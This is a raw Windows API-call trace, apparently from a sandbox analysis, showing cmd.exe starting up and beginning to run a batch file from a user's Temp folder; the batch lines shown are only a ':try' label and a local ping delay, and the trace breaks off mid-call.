[0160.661] GetCurrentProcessId () returned 0xcc [0160.661] GetCurrentThreadId () returned 0x780 [0160.661] GetTickCount () returned 0x3078e [0160.661] QueryPerformanceCounter (in: lpPerformanceCount=0x3ff8d4 | out: lpPerformanceCount=0x3ff8d4*=27887633478) returned 1 [0160.662] GetModuleHandleA (lpModuleName=0x0) returned 0x4ac10000 [0160.662] __set_app_type (_Type=0x1) [0160.662] __p__fmode () returned 0x75c631f4 [0160.662] __p__commode () returned 0x75c631fc [0160.662] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac321a6) returned 0x0 [0160.662] __getmainargs (in: _Argc=0x4ac34238, _Argv=0x4ac34240, _Env=0x4ac3423c, _DoWildCard=0, _StartInfo=0x4ac34140 | out: _Argc=0x4ac34238, _Argv=0x4ac34240, _Env=0x4ac3423c) returned 0 [0160.662] GetCurrentThreadId () returned 0x780 [0160.662] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x780) returned 0x60 [0160.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75c90000 [0160.662] GetProcAddress (hModule=0x75c90000, lpProcName="SetThreadUILanguage") returned 0x75cba84f [0160.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.663] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.663] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ff86c | out: phkResult=0x3ff86c*=0x0) returned 0x2 [0160.663] VirtualQuery (in: lpAddress=0x3ff8a3, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.663] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0160.663] VirtualQuery 
(in: lpAddress=0x301000, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0160.663] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.663] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ff83c, dwLength=0x1c | out: lpBuffer=0x3ff83c*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x130000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0160.663] GetConsoleOutputCP () returned 0x1b5 [0160.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0160.663] SetConsoleCtrlHandler (HandlerRoutine=0x4ac2e72a, Add=1) returned 1 [0160.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0160.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac341ac | out: lpMode=0x4ac341ac) returned 1 [0160.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.664] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.664] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac341b0 | out: lpMode=0x4ac341b0) returned 1 [0160.664] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.664] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0160.664] GetEnvironmentStringsW () returned 0x7921d8* [0160.664] FreeEnvironmentStringsW (penv=0x7921d8) returned 1 [0160.664] GetEnvironmentStringsW () returned 0x7921d8* [0160.664] FreeEnvironmentStringsW (penv=0x7921d8) returned 1 [0160.664] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", 
ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fe7dc | out: phkResult=0x3fe7dc*=0x68) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x0, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x1, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x1, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x0, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x40, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x40, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x40, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegCloseKey (hKey=0x68) returned 0x0 [0160.665] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3fe7dc | out: 
phkResult=0x3fe7dc*=0x68) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x40, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x1, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x1, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x0, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x9, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x4, lpData=0x3fe7e8*=0x9, lpcbData=0x3fe7e0*=0x4) returned 0x0 [0160.665] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3fe7e4, lpData=0x3fe7e8, lpcbData=0x3fe7e0*=0x1000 | out: lpType=0x3fe7e4*=0x0, lpData=0x3fe7e8*=0x9, lpcbData=0x3fe7e0*=0x1000) returned 0x2 [0160.665] RegCloseKey (hKey=0x68) returned 0x0 [0160.665] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8801d7 [0160.665] srand (_Seed=0x5b8801d7) [0160.665] GetCommandLineW () returned="cmd /c C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.665] GetCommandLineW () 
returned="cmd /c C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.666] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x794508, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0160.666] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0160.666] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.666] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0160.666] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.666] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0160.666] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0160.666] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0160.666] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0160.666] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0160.666] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0160.666] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0160.666] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0160.666] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0160.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ff5a8 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.666] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x3ff5a8, lpFilePart=0x3ff5a4 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFilePart=0x3ff5a4*="Temp") returned 0x24 [0160.666] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0160.666] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.666] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.666] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.666] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.666] _wcsnicmp (_String1="ADU0VK~1", _String2="ADU0VK~1", _MaxCount=0x8) returned 0 [0160.667] _wcsicmp (_String1="aDU0VK IWA5kLS", _String2="ADU0VK~1") returned -94 [0160.667] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.667] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.667] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.667] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.667] FindFirstFileW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFindFileData=0x3ff324 | out: lpFindFileData=0x3ff324) returned 0x792058 [0160.667] FindClose (in: hFindFile=0x792058 | out: hFindFile=0x792058) returned 1 [0160.667] GetFileAttributesW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 0x2010 [0160.667] SetCurrentDirectoryW (lpPathName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp" (normalized: 
"c:\\users\\adu0vk~1\\appdata\\local\\temp")) returned 1 [0160.667] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 1 [0160.667] GetEnvironmentStringsW () returned 0x7921d8* [0160.667] FreeEnvironmentStringsW (penv=0x7921d8) returned 1 [0160.667] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.668] GetConsoleOutputCP () returned 0x1b5 [0160.668] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac34260 | out: lpCPInfo=0x4ac34260) returned 1 [0160.668] GetUserDefaultLCID () returned 0x409 [0160.668] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac34950, cchData=8 | out: lpLCData=":") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ff6e8, cchData=128 | out: lpLCData="0") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ff6e8, cchData=128 | out: lpLCData="0") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ff6e8, cchData=128 | out: lpLCData="1") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac34940, cchData=8 | out: lpLCData="/") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac34d80, cchData=32 | out: lpLCData="Mon") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac34d40, cchData=32 | out: lpLCData="Tue") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac34d00, cchData=32 | out: lpLCData="Wed") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac34cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac34c80, cchData=32 | out: lpLCData="Fri") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac34c40, cchData=32 | out: lpLCData="Sat") returned 4 [0160.669] 
GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac34c00, cchData=32 | out: lpLCData="Sun") returned 4 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac34930, cchData=8 | out: lpLCData=".") returned 2 [0160.669] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac34920, cchData=8 | out: lpLCData=",") returned 2 [0160.669] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0160.670] GetConsoleTitleW (in: lpConsoleTitle=0x780860, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75c90000 [0160.670] GetProcAddress (hModule=0x75c90000, lpProcName="CopyFileExW") returned 0x75cc3b92 [0160.670] GetProcAddress (hModule=0x75c90000, lpProcName="IsDebuggerPresent") returned 0x75ca4a5d [0160.670] GetProcAddress (hModule=0x75c90000, lpProcName="SetConsoleInputExeNameW") returned 0x75cba79d [0160.672] _wcsicmp (_String1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", _String2=")") returned 58 [0160.672] _wcsicmp (_String1="FOR", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 3 [0160.672] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 3 [0160.672] _wcsicmp (_String1="IF", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 6 [0160.672] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 6 [0160.672] _wcsicmp (_String1="REM", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 15 [0160.672] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 15 [0160.673] GetConsoleTitleW (in: lpConsoleTitle=0x3ff3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.674] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.674] 
GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3ff19c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x3ff194, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3ff194*=0xfcdf19fa, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0160.675] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0160.675] SetErrorMode (uMode=0x0) returned 0x8001 [0160.676] SetErrorMode (uMode=0x1) returned 0x0 [0160.676] GetFullPathNameW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x780d68, lpFilePart=0x3fef00 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp", lpFilePart=0x3fef00*="Temp") returned 0x24 [0160.676] SetErrorMode (uMode=0x8001) returned 0x1 [0160.676] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\.") returned 1 [0160.676] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0160.679] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.679] FindFirstFileExW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", fInfoLevelId=0x1, lpFindFileData=0x3fec9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fec9c) returned 0x780f08 [0160.679] FindClose (in: hFindFile=0x780f08 | out: hFindFile=0x780f08) returned 1 [0160.679] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0160.679] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0160.679] GetConsoleTitleW (in: lpConsoleTitle=0x3ff174, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.680] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76650000 [0160.680] GetProcAddress 
(hModule=0x76650000, lpProcName="SaferIdentifyLevel") returned 0x76672102 [0160.706] IdentifyCodeAuthzLevelW () returned 0x1 [0160.715] GetProcAddress (hModule=0x76650000, lpProcName="SaferComputeTokenFromLevel") returned 0x76673352 [0160.715] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0160.715] GetProcAddress (hModule=0x76650000, lpProcName="SaferCloseLevel") returned 0x76673825 [0160.715] CloseCodeAuthzLevel () returned 0x1 [0160.715] SetErrorMode (uMode=0x0) returned 0x8001 [0160.715] SetErrorMode (uMode=0x1) returned 0x0 [0160.715] GetFullPathNameW (in: lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", nBufferLength=0x104, lpBuffer=0x780ae8, lpFilePart=0x3ff060 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", lpFilePart=0x3ff060*="1.bat") returned 0x2a [0160.715] SetErrorMode (uMode=0x8001) returned 0x1 [0160.717] CmdBatNotification () returned 0x780b3a [0160.717] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0160.717] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0160.717] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.717] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.718] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.718] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.718] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0xc6, lpOverlapped=0x0) returned 1 [0160.719] SetFilePointer (in: hFile=0x78, 
lDistanceToMove=6, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6 [0160.719] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=6, lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr=":try\r\n") returned 6 [0160.719] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.719] GetFileType (hFile=0x78) returned 0x1 [0160.719] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.719] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6 [0160.720] _tell (_FileHandle=3) returned 6 [0160.720] _close (_FileHandle=3) returned 0 [0160.720] CreateFileW (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\1.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3ff0a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0160.720] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0160.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=6, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6 [0160.720] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6 [0160.720] ReadFile (in: hFile=0x78, lpBuffer=0x4ac36640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3ff088, lpOverlapped=0x0 | out: lpBuffer=0x4ac36640*, lpNumberOfBytesRead=0x3ff088*=0xc0, lpOverlapped=0x0) returned 1 [0160.720] SetFilePointer (in: hFile=0x78, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0160.720] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ac36640, cbMultiByte=26, 
lpWideCharStr=0x4ac3c640, cchWideChar=8191 | out: lpWideCharStr="ping localhost -n 2 >NUL\r\n") returned 26 [0160.721] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.721] GetFileType (hFile=0x78) returned 0x1 [0160.721] _get_osfhandle (_FileHandle=3) returned 0x78 [0160.721] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0160.721] _wcsicmp (_String1="ping", _String2=")") returned 71 [0160.722] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0160.722] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0160.722] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0160.722] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0160.722] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0160.722] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0160.723] _tell (_FileHandle=3) returned 32 [0160.723] _close (_FileHandle=3) returned 0 [0160.724] _vsnwprintf (in: _Buffer=0x4ac44640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3fee5c | out: _Buffer="\r\n") returned 2 [0160.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.724] GetFileType (hFile=0x7) returned 0x2 [0160.724] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.724] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee1c | out: lpMode=0x3fee1c) returned 1 [0160.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.724] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac44640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3fee48, lpReserved=0x0 | out: lpBuffer=0x4ac44640*, lpNumberOfCharsWritten=0x3fee48*=0x2) returned 1 [0160.726] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac40640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0160.726] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac35260 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 0x24 [0160.726] _vsnwprintf (in: _Buffer=0x4ac35e40, 
_BufferCount=0x3fe, _Format="%s", _ArgList=0x3fee58 | out: _Buffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp") returned 36 [0160.726] _vsnwprintf (in: _Buffer=0x4ac35e88, _BufferCount=0x3da, _Format="%c", _ArgList=0x3fee58 | out: _Buffer=">") returned 1 [0160.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.726] GetFileType (hFile=0x7) returned 0x2 [0160.726] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.726] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3fee20 | out: lpMode=0x3fee20) returned 1 [0160.726] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.726] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4ac35e40*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x3fee4c, lpReserved=0x0 | out: lpBuffer=0x4ac35e40*, lpNumberOfCharsWritten=0x3fee4c*=0x25) returned 1 [0160.727] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.727] GetFileType 